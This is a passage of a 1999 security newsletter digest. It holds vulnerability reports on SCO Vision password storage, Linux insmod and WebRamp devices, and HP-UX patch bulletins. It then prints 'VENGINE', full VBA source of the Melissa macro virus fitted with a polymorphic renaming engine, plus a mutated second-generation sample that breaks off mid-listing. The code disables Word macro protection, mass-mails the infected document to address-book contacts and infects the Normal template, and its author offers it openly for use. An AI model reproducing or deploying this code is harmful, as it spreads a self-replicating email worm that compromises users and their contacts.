good 15 minutes to discover the encryption is nothing more than a fixed string XOR :( I informed SCO of this on 30th March and received a reply the next day :) -- >From Matthew Schofield, Support JJ, Thanks for highlighting this issue in the Vision Comms. By your own definition it is insecure, in that the contents of the .vca files can be obtained with some effort. In terms of actually using someone's .vca file through the comms layer in order to access the UNIX resources through a Vision product, the files can only read by the comms layer if the user has successfully logged into Windows as that user. -- Extracted from my reply - This is of no consequence. The point is that I can extract the UNIX username & password from another user that has used the same PC. If that user happens to use root access then I have the root password - thus a non privileged user with windows access can gain root privs on the UNIX box, whether through UNIX Neighborhood, terminal emulation, a terminal itself, telnet etc. If I were a windows user with no user account on the UNIX box......... :) -- When adding a host, the security options can be set to 'Prompt' where the password is not saved. Yes this is only a potential security hole - another on the 'Configuration' issue, but it is not obvious that this vulnerability exists. The default is insecure and there is no 'obvious' information in the documentation that it is so - hence my post. Matthew finished by saying -- As you have already identified, you should change the password mechanism for your host to prompt. In a future release we intend to either change the operation of the password mechanism or add an appropriate warning. -- Can't really say fairer than that I suppose... Regards, JJ Gray Sed quis custodiet ipsos custodes ? @HWA 15.0 Linux INSMOD exploit/vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 30 Mar 1999 22:08:13 -0500 From: Brian Szymanski To: BUGTRAQ@netspace.org Subject: linux insmod bug/security vulnerability Howdy all, Recently I discovered a bug in insmod that would require a lot of time and luck to exploit, but is nonetheless important for systems wanting rock-solid security (security shouldn't be a matter of luck). In short, when insmod is called without a full path to the module to load, it checks a small path to find the module in question. By default, this path is the current directory followed by the /lib/modules/ heirarchy. In the widely distributed versions of the software, the module is not checked for root ownership, and there is no way to tell which file has been loaded after insmod is called. Needless to say, putting a malicious user's code in to the kernel and then running it in kernel mode is a very Bad Thing. LINUX DEVELOPERS, HOWTO-WRITERS, ETC... TAKE HEED!!! The listed maintainer of the program, Jacques Gelinas (jack@solucorp.qc.ca), informs me that modprobe (not insmod) should be used to load pathless modules from the /lib/modules heirarchy, but in practice most people (and precanned scripts) use insmod, compounding the problem. It appears that the well distributed versions of modprobe are NOT vulnerable to these bugs (tested on debian 2.1). ***Please change any documentation you write or scripts you distribute to use modprobe instead of insmod ASAP*** This should probably be forwarded to some sort of linux development list, but I know of none at the moment. VERSIONS AFFECTED, IMPROVED (if not fixed) VERSION: The versions included in debian, redhat, and most if not all other distributions are vulnerable as well. Any version previous to 2.2.2-pre6 (available from http://www.pi.se/blox/modutils/modutils-2.2.2-pre6.tar.gz). Please upgrade to this version, which one of the package maintainers, Bjorn Ekwall (bj0rn@blox.se), informs me fixes the following issues: o A module has to be owned by root. o All "path-less" modules are resolved according to the list of paths in conf.modules (explicitly or via the built-in defaults). Note that all module utilities use the same configuration and thus the same paths in the new release. o If insmod is called without a path to the module, insmod will print the full path of the module it actually selects to install. PROBLEMS IN THE NEW VERSION: The new version is a big improvement, but not perfect (after all, it's a pre-stable version...) The last 2 points appear to be implemented fine, but the first is imperfect. The root ownership checks only appear to happen when the path to the module is not specified. I don't see any reason why you would ever need to load a module owned by a user, when you can just su and copy /chown it. Also, there is some oddness when a module in /lib/modules isn't owned by root. insmod spits out 24(!) lines like this: insmod: /lib/modules/2.2.4/misc/vmmon is not owned by root That's better, but I still don't like the idea of bugs in this area of the code... Another thing to be wary of: There may be some unresolved issues with groups and permissions, but it'd probably just be bloat for this package to worry about warning of those issues (IE, mode a+w modules or g+w with group != root). Then again, linux's swapon checks for the proper permissions on a swapfile/device, so perhaps it wouldn't be unreasonable to warn about permissions. I don't see what's so hard about just checking for ownership and permissions issues *after* resolving the full path of the module, but then again, I've been too lazy to RTFS so far, so sue me if it isn't that trivial. EXPLOIT: As previously mentioned, an exploit would require a lot of luck and time, but would basically consist of regularly throwing a lot of trojan'd .o files in /tmp, and waiting until root decides to clean out tmp right before loading some module... Far-fetched but too possible for comfort. Other scenarios along these lines could be imagined. Equally far fetched, but the point is the currently distributed versions don't do it the Right Way... It's a lot more likely that you would make your system crash and burn due to this bug (although files do seem to be checked to be in elf format before being loaded). Thanks for reading. Comments and constructive criticisms more than welcome: Brian Szymanski bks10@cornell.edu @HWA 16.0 Webramp DoS ~~~~~~~~~~~ Date: Wed, 31 Mar 1999 15:28:22 -0500 (EST) From: X-Force To: alert@iss.net Cc: X-Force Subject: ISSalert: ISS Security Advisory -- WebRamp Denial of Service Attacks TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to majordomo@iss.net Contact alert-owner@iss.net for help with any problems! --------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- ISS Security Advisory -- WebRamp Denial of Service Attacks March 31, 1999 Synopsis: Ramp Networks (http://www.rampnet.com/) WebRamp Internet access devices allow multiple computers to share a dialup connection. The WebRamp family of Internet access devices are designed for small businesses that require cost-effective, high-speed Internet access on every desktop. WebRamp is vulnerable to two denial of service attacks that allow an attacker to either crash the WebRamp device or change its IP address. When the device crashes, it will have to be manually reset before it will dial up. If an attacker changes the IP address of the WebRamp, none of the machines on your network will be able to find it, so no machines will be able to access the Internet via the WebRamp. The device will still function as a network hub, so your intra-LAN connectivity will not be disrupted. Description: WebRamp crash/denial of service attack: Sending a specially formatted string of characters to the HTTP port of the WebRamp causes the device to hang, requiring a manual reset. WebRamp IP address change: Sending a specially-formatted UDP packet to port 5353 changes the WebRamp's local IP address, effectively 'hiding' the device from the rest of your machines. The WebRamp is still connected to the Internet and its PPP IP address is unchanged. Recommendations: If an attacker has crashed your WebRamp, then manually reset it by turning it off and on again. If an attacker has changed the IP address, use WRFINDER.EXE on the WebRamp installation CD to change the address to a proper value. Fix Information: Go to http://www.rampnet.com/upgrades to get the latest firmware for your model of WebRamp. Additional Information: Information in this advisory was obtained by the research of Jon Larimer of the ISS X-Force. ISS X-Force would like to thank Ramp Networks for their assistance with testing on WebRamp devices and providing fix information. ________ Copyright (c) 1999 by Internet Security Systems, Inc. Permission is hereby granted for the electronic redistribution of this Security Advisory. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Security Advisory in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Internet Security Systems, Inc. (ISS) is the leading provider of adaptive network security monitoring, detection, and response software that protects the security and integrity of enterprise information systems. By dynamically detecting and responding to security vulnerabilities and threats inherent in open systems, ISS's SAFEsuite family of products provide protection across the enterprise, including the Internet, extranets, and internal networks, from attacks, misuse, and security policy violations. ISS has delivered its adaptive network security solutions to organizations worldwide, including firms in the Global 2000, nine of the ten largest U.S. commercial banks, and over 35 governmental agencies. For more information, call ISS at 678-443-6000 or 800-776-2362 or visit the ISS Web site at http://www.iss.net. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as well as on MIT's PGP key server and PGP.com's key server. X-Force Vulnerability and Threat Database: http://www.iss.net/xforce Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBNwEjQTRfJiV99eG9AQHS2AQAilU+R2J0pU2DMi+0CBMjl1zwIPob990s n4ECDLLimt66TLeZW3fBxstHOzWUJ1YRPm/Ahb0oeyDqx54Cv4LA3uZttq5mZ2+d d84nPbznpzC6Q/9eqVX8tNF0cp2TNc2eIqkwV4I1ZZ68JMkepmglT73mPqpzWJL8 fIT8UGYykDs= =4bwl -----END PGP SIGNATURE----- @HWA 17.0 HP Security bulletins, (March 31) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 31 Mar 1999 04:35:03 -0800 (PST) Subject: Security Bulletins Digest >From: support_feedback@us-support.external.hp.com (HP Electronic Support Center ) To: security_info@us-support.external.hp.com Reply-To: support_feedback@us-support.external.hp.com Errors-To: support_errors@us-support.external.hp.com HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://us-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== ? Digest Name: Daily Security Bulletins Digest Created: Wed Mar 31 3:00:02 PST 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9903-096 Security Vulnerability in MC/ServiceGuard & MC/LockManager HPSBUX9903-095 Security Vulnerability with DESMS The documents are listed below. ------------------------------------------------------------------------------- ? Document ID: HPSBUX9903-096 Date Loaded: 19990330 Title: Security Vulnerability in MC/ServiceGuard & MC/LockManager ------------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00096, 31 March 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: MC/ServiceGuard and MC/LockManager exhibit improper implementation of restricted SAM functionality. PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.X and 11.00 DAMAGE: Users can gain increased privileges. SOLUTION: Apply the patches listed below. AVAILABILITY: All patches are available now. ------------------------------------------------------------------------- I. A. Background MC/ServiceGuard and MC/LockManager exhibit improper implementation of restricted SAM functionality. B. Fixing the problem - Install the applicable patch: HP-UX Release Product Revision Patch ID 10.00 MC/SG A.10.03 PHSS_17478 10.01 MC/SG A.10.03 PHSS_17478 10.10 MC/SG MC/LM A.10.05 PHSS_17479 10.20 MC/SG MC/LM A.10.06 PHSS_17480 10.20 MC/SG A.10.11 PHSS_17580 10.20 MC/LM A.10.07.01 PHSS_17482 11.00 MC/SG A.11.05 PHSS_17581 11.00 MC/LM A.11.05 PHSS_17483 11.00 MC/LM-J A.11.05 PHSS_17484 C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ -----End of Document ID: HPSBUX9903-096-------------------------------------- ? Document ID: HPSBUX9903-095 Date Loaded: 19990330 Title: Security Vulnerability with DESMS ------------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00095, 31 March 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Domain Enterprise Server Management System (DESMS) processes allow increased privileges. PLATFORM: HP 9000 Series 7/800 Servers running HP-UX 10.20 and 11.00 DAMAGE: Users can gain increased privileges. SOLUTION: Apply the patches listed below. AVAILABILITY: All patches are available now. ------------------------------------------------------------------------- I. A. Background Hewlett-Packard Company HP9000 Series 7/800 servers that run the following software packages have extra Domain Management background processes running which cause security problems. B. Fixing the problem If you are using one of the products listed below, then install the applicable patch for your revision of HP-UX: For HP-UX release 10.20: PHNE_17948; For HP-UX release 11.00: PHNE_18017 for product J1593AA only; For HP-UX release 11.00: PHNE_17949 for all other products listed below. Product Description Affected Revision J1564DA Netscape Calendar Server All J1592AA HP Domain Service Control All J1593AA A/R HP Domain Service Control Packaged Edition All J3633CA Netscape/Informix US/Canada All J3638BA HP Domain/Netscape Suitespot Pro All J3641DA Netscape Enterprise Server All J3651DA Netscape Collabra Server All J3655DA Netscape Message Server All J3667AA Netscape Directory Server All J3675BA HP Domain/Netscape SuiteSpot (S700) All J3676BA HP Domain/Netscape SuiteSpot (S800) All J3678AA Netscape Proxy Server All J4244AA Domain Commerce Server All NOTE: This vulnerability does not apply to any of the VirtualVault releases. C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ -----End of Document ID: HPSBUX9903-095-------------------------------------- @HWA 18.0 VENGINE - creates polymorphic variants of the melissa virus. code included. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ VENGINE - Coded by VeggieTailz, Copyleft 1999 The Vengine, combined with your favorite Microsoft Word macro virus, produces a polymorphic version of that virus. Sorry kiddiez, but you will need rudementary VBA skillz to use this. Instructions are included in the vengine.txt file, and an example is given with the Melissa virus. I had several motivations for writing this. One, of course, was to demonstrate that WOMEN CAN CODE TOO, a fact often overlooked in today's patriarchal society. Secondly, I was motivated by all the delightful publicity provided by the mass media surrounding the Melissa virus. Seriously, folks, no one would write viruses if the antivirus community didn't give them such limelight for it! :-) I also wanted to pedistal yet another egregious security hole brought to you by Microsoft. And, lastly, my initial inspiration came from Nick FitzGerald's asinine posting to BugTraq, dated 3/29/99, in which he argues that: "By reformatting the source, you have created a new variant." Thanks to the Vengine, now every copy of the virus can be a new variant! Files in this archive: Polyssa.txt - The Melissa virus modified with the Vengine Polyssa2.txt - A 2nd generation of Polyssa Vengine.txt - The Vengine source code and usage directions Melissa.txt - The original Melissa virus Readme.txt - This file kiddiez.txt - STEP-BY-STEP INSTRUCTIONS, FOR THE BRAINDEAD In closing, I would like to give a big pat-on-the-back to the drooling masses out there who unwittingly propogate MS-Word macro viruses. Without these people, neither the virus writers nor the antivirus people would be in business! Remember: When MS-Word asks you if you want to open a document because it might contain virus code, JUST SAY NO. ;-> \/eggieTailz -=- Polyssa.txt -=- ' Polyssa - polymorphic version of Melissa ' ' This code demonstrates how to use the Vengine polymorphizer for MS-Word. ' Both the example and the Vengine itself were coded by VeggieTailz. The ' original Melissa code was written by Kwyjibo. ' ' The Vengine concept was inspired by Nick FitzGerald's asinine posting ' on BugTraq, dated 3/29/99 and archived at geek-girl.com. Special ' thanks go to Microsoft for their myopic scripting language. ' Private Zy7td() As String Private QC2cz() As String Private K1j() As String Private Nv4cl As String Private Sub Document_Open() On Error Resume Next Randomize: If Rnd > 0.6 Then OldMelissaCode End Sub Private Sub Document_Close() On Error Resume Next Randomize: If Rnd > 0.6 Then OldMelissaCode End Sub Private Sub OldMelissaCode() ' This is the Melissa code, obtained from www.root.org If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo ' BreakUmOffASlice.Subject = "Important Message From " & Application.UserName ' BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" ' Pick something a little more generic: BreakUmOffASlice.Subject = "Your mail" BreakUmOffASlice.Body = "How's this?" + Chr$(13) + Application.UserName BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then ' Do While ADI1.CodeModule.Lines(1, 1) = "" ' ADI1.CodeModule.DeleteLines 1 ' Loop ' ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") ' Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ' ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) ' BGN = BGN + 1 ' Loop Infect ADI1.CodeModule, ToInfect.CodeModule End If If DoAD = True Then ' Do While NTI1.CodeModule.Lines(1, 1) = "" ' NTI1.CodeModule.DeleteLines 1 ' Loop ' ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") ' Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ' ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) ' BGN = BGN + 1 ' Loop Infect NTI1.CodeModule, ToInfect.CodeModule End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If ' Kudos to original author: ' => WORD/Melissa written by Kwyjibo ' => Works in both Word 2000 and Word 97 ' => Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! ' => Word -> Email | Word 97 <--> Word 2000 ... it's a new age! ' This must go: 'If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub Private Sub InfectTable() ' This table stores the identifiers which can be scrambled. They can ' be any ordinary variable name (even names ending with a suffix like ' % or $). ReDim QC2cz(50) ' Don't forget to set the array size! QC2cz(1) = "Infect" QC2cz(2) = "InfectTable" QC2cz(3) = "Zy7td" QC2cz(4) = "QC2cz" QC2cz(5) = "K1j" QC2cz(6) = "Nv4cl" QC2cz(7) = "Co6q" QC2cz(8) = "X3X" QC2cz(9) = "R0e" QC2cz(10) = "Tq4tl" QC2cz(11) = "G4u" QC2cz(12) = "To6dm" QC2cz(13) = "Rg4mp" QC2cz(14) = "I4h" QC2cz(15) = "I6w" QC2cz(16) = "Gy0u" QC2cz(17) = "S5l" QC2cz(18) = "T1g" QC2cz(19) = "T1b" QC2cz(20) = "Ba6Dk%" ' Note the "%" suffix QC2cz(21) = "X1U%" QC2cz(22) = "C6E%" QC2cz(23) = "C6z%" QC2cz(24) = "X6q" QC2cz(25) = "XM2wj" QC2cz(26) = "Yx1h" QC2cz(27) = "Sh6k" QC2cz(28) = "T2w" QC2cz(29) = "Ky8c" ' Melissa entries: QC2cz(30) = "OldMelissaCode" QC2cz(31) = "UngaDasOutlook" QC2cz(32) = "DasMapiName" QC2cz(33) = "BreakUmOffASlice" QC2cz(34) = "Melissa?" QC2cz(35) = "Kwyjibo" QC2cz(36) = "y" QC2cz(37) = "x" QC2cz(38) = "oo" QC2cz(39) = "AddyBook" QC2cz(40) = "Peep" QC2cz(41) = "ADI1" QC2cz(42) = "NTI1" ' Don't you miss the old DATA statements? :-) QC2cz(43) = "NTCL" QC2cz(44) = "ADCL" QC2cz(45) = "BGN" QC2cz(46) = "Melissa" QC2cz(47) = "ToInfect" QC2cz(48) = "DoAD" QC2cz(49) = "DoNT" QC2cz(50) = "CYA" ' EVERYTHING BELOW HERE IS THE VENGINE End Sub Private Sub Infect(Co6q, X3X) ReDim Zy7td(0) ReDim QC2cz(0) ReDim K1j(0) Dim R0e As String For I = 1 To Co6q.CountOfLines R0e = Co6q.Lines(I, 1) If Trim(R0e) <> "" Then T2w R0e, 1 Next I Tq4tl X3X.DeleteLines 1, X3X.CountOfLines X3X.AddFromString "" For I = 1 To Co6q.CountOfLines R0e = Co6q.Lines(I, 1) If Trim(R0e) <> "" Then Nv4cl = "" T2w R0e, 2 If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b" X3X.InsertLines X3X.CountOfLines + 1, Nv4cl End If Next I End Sub Private Sub Sh6k(To6dm As String, Rg4mp As Integer) G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2 If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2) I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z" Ky8c = UCase$(Right$(To6dm, 1)) If Rg4mp = 1 Then If I4h Then For Ba6Dk% = 1 To UBound(Zy7td) If To6dm = Zy7td(Ba6Dk%) Then Exit Sub Next Ba6Dk% ReDim Preserve Zy7td(UBound(Zy7td) + 1) Zy7td(UBound(Zy7td)) = To6dm End If Exit Sub End If If I4h Then For Ba6Dk% = 1 To UBound(QC2cz) If To6dm = QC2cz(Ba6Dk%) Then To6dm = K1j(Ba6Dk%) If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c Exit For End If Next Ba6Dk% End If If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34) If Nv4cl <> "" Then If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm End If Nv4cl = Nv4cl + To6dm End Sub Private Sub Tq4tl() InfectTable ReDim Preserve K1j(UBound(QC2cz)) For Ba6Dk% = 1 To UBound(K1j) I6w: Gy0u = Int(Rnd * 3) + 3 S5l = "" For X1U% = 1 To Gy0u T1g = Chr$(97 + Int(Rnd * 26)) If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g) If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9) S5l = S5l + T1g Next X1U% For X1U% = 1 To UBound(Zy7td) If S5l = Zy7td(X1U%) Then GoTo I6w Next X1U% For X1U% = 1 To Ba6Dk% - 1 If S5l = K1j(X1U%) Then GoTo I6w Next X1U% K1j(Ba6Dk%) = S5l Next Ba6Dk% End Sub Private Sub T2w(R0e As String, Rg4mp As Integer) Dim To6dm As String Dim T1g As String Do R0e = LTrim(R0e) XM2wj = False If Len(R0e) = 0 Then Exit Do C6E% = 1 T1g = UCase$(Left$(R0e, 1)) X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9") Do If C6E% > Len(R0e) Then Exit Do T1g = Mid$(R0e, C6E%, 1) If T1g = Chr$(34) Then If XM2wj Then C6E% = C6E% + 1: Exit Do XM2wj = True End If If Not XM2wj Then If X6q Then If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do End If Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z" Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_" If X6q <> Yx1h Then Exit Do If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do End If C6E% = C6E% + 1 Loop To6dm = Left$(R0e, C6E% - 1) R0e = Right$(R0e, Len(R0e) - (C6E% - 1)) If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do Sh6k To6dm, Rg4mp Loop End Sub -=- Polyssa2.txt -=- ' This file contains example 2nd generation output from Polyssa ' T1b ' T1b ' T1b Private NM9D() As String Private Jk4tn() As String Private XL2o() As String Private To6i As String Private Sub Document_Open() On Error Resume Next Randomize: If Rnd > 0.6 Then Lm2jv End Sub Private Sub Document_Close() On Error Resume Next Randomize: If Rnd > 0.6 Then Lm2jv End Sub Private Sub Lm2jv() If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False ' T1b Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim Rm4gU, K0t, Xy9ti ' T1b Set Rm4gU = CreateObject("Outlook.Application") Set K0t = Rm4gU.GetNameSpace("MAPI") ' T1b If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") <> "Gp5Xr" Then If Rm4gU = "Outlook" Then K0t.Logon "profile", "password" For D7R = 1 To K0t.AddressLists.Count Set Qt3tq = K0t.AddressLists(D7R) ' T1b Au1R = 1 Set Xy9ti = Rm4gU.CreateItem(0) For T6e = 1 To Qt3tq.AddressEntries.Count J2P = Qt3tq.AddressEntries(Au1R) Xy9ti.Recipients.Add J2P Au1R = Au1R + 1 If Au1R > 50 Then T6e = Qt3tq.AddressEntries.Count Next T6e Xy9ti.Subject = "Your mail" Xy9ti.Body = "How's this?" + Chr$(13) + Application.UserName Xy9ti.Attachments.Add ActiveDocument.FullName Xy9ti.Send J2P = "" Next D7R K0t.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") = "Gp5Xr" End If Set Td7x1 = ActiveDocument.VBProject.VBComponents.Item(1) Set RV8Q1 = NormalTemplate.VBProject.VBComponents.Item(1) ' T1b D1d = RV8Q1.CodeModule.CountOfLines B6r = Td7x1.CodeModule.CountOfLines Qz3c = 2 If Td7x1.Name <> "Fg2c" Then If B6r > 0 Then Td7x1.CodeModule.DeleteLines 1, B6r Set Ih0M = Td7x1 Td7x1.Name = "Fg2c" Wn2zR = True End If If RV8Q1.Name <> "Fg2c" Then If D1d > 0 Then RV8Q1.CodeModule.DeleteLines 1, D1d Set Ih0M = RV8Q1 RV8Q1.Name = "Fg2c" Gj5y = True End If ' T1b If Gj5y <> True And Wn2zR <> True Then GoTo Yt9qC If Gj5y = True Then Wc4vu Td7x1.CodeModule, Ih0M.CodeModule End If If Wn2zR = True Then ' T1b ' T1b Wc4vu RV8Q1.CodeModule, Ih0M.CodeModule End If Yt9qC: ' T1b If D1d <> 0 And B6r = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ' T1b ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ' T1b ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True ' T1b End If ' T1b End Sub Private Sub P5R() ' T1b ReDim Jk4tn(50) Jk4tn(1) = "Wc4vu" Jk4tn(2) = "P5R" Jk4tn(3) = "NM9D" Jk4tn(4) = "Jk4tn" Jk4tn(5) = "XL2o" ' T1b Jk4tn(6) = "To6i" ' T1b Jk4tn(7) = "ID2Ki" Jk4tn(8) = "H2f" Jk4tn(9) = "Q6d" Jk4tn(10) = "E7m" Jk4tn(11) = "Ze6Fm" Jk4tn(12) = "Ve7Fv" Jk4tn(13) = "C5m" Jk4tn(14) = "Ac4G" ' T1b Jk4tn(15) = "L1G" Jk4tn(16) = "F6P" Jk4tn(17) = "Qz9yi" Jk4tn(18) = "CI1j" Jk4tn(19) = "Qg1sh" Jk4tn(20) = "X3J%" Jk4tn(21) = "Vs1fb%" ' T1b Jk4tn(22) = "S4u%" Jk4tn(23) = "Jo5n%" 